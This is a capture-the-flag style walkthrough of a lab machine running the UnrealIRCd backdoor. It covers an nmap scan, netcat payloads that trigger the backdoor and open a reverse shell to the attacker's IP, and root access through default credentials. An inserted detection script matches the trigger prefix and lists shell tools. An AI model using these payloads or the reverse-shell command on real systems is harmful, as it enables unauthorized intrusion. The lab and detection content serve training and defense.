Machine IP →
Nmap scan →
nmap -sC -sV -Pn -p- -A -o nmap.txt 192.168.56.120
OS Detection →
| Port | Service | Other details (if any) |
|---|---|---|
| 6667, 6697, 8067 | IRC | UnrealIRCd |
The only service is IRC, so Exploit-DB was searched via searchsploit for an exploit. This returned 4 entries. Looking at the code for the first one, there seems to be a backdoor which allows execution of shell commands when anything starts with
Therefore, access can be checked by connecting to the IRCd via netcat and sending the payload
AB;echo "a" | nc 192.168.49.56 3002. With a listener active on the attacking machine at the IP used in the payload, a connection and the letter "a" would be received.
Therefore, a similar payload can be used to receive a shell via nc →
AB;nc 192.168.49.56 3002 -e /bin/bash. This gives a shell as the server user. The home directory has the user flag.
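A detection-side view of the payloads above, as an added example that is not part of the original write-up: it scans a captured client-to-server IRC byte stream for lines that begin with the AB trigger seen in those payloads. The function names, the token list and the sample capture are constructed for illustration.

```python
import re

# Trigger prefix seen in this write-up's payloads ("AB;...").
TRIGGER = b"AB"
# Assumed token list: commands that suggest a socket or shell is being spawned.
SUSPICIOUS = re.compile(rb"\b(nc|ncat|bash|sh|curl|wget)\b")

def split_irc_lines(stream: bytes):
    """Split a raw client-to-server stream on CRLF or bare LF, dropping empty lines."""
    return [line for line in re.split(rb"\r?\n", stream) if line]

def find_backdoor_triggers(stream: bytes):
    """Return one record per line that starts with the trigger prefix."""
    hits = []
    for number, line in enumerate(split_irc_lines(stream), start=1):
        # Only the start of the line counts; "AB" inside a chat message is normal text.
        if not line.startswith(TRIGGER):
            continue
        command = line[len(TRIGGER):].lstrip(b";").strip()
        hits.append({
            "line": number,
            "command": command.decode("utf-8", "replace"),
            "spawns_shell_or_socket": bool(SUSPICIOUS.search(command)),
        })
    return hits

# Constructed sample capture: normal registration, two trigger lines, one benign message.
SAMPLE = (
    b"NICK alice\r\n"
    b"USER alice 0 * :Alice\r\n"
    b'AB;echo "a" | nc 192.168.49.56 3002\n'
    b"PRIVMSG #lab :ABout to restart\r\n"
    b"AB;id\r\n"
)

if __name__ == "__main__":
    for hit in find_backdoor_triggers(SAMPLE):
        print(hit)
```

Run it over traffic reassembled from the IRC ports listed in the scan table; any hit on a line that is not a valid IRC message warrants checking the daemon binary and the host for the follow-on connection.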
With the shell of the server user, trying the default creds root:root works for getting a shell as root. This gives the root flag.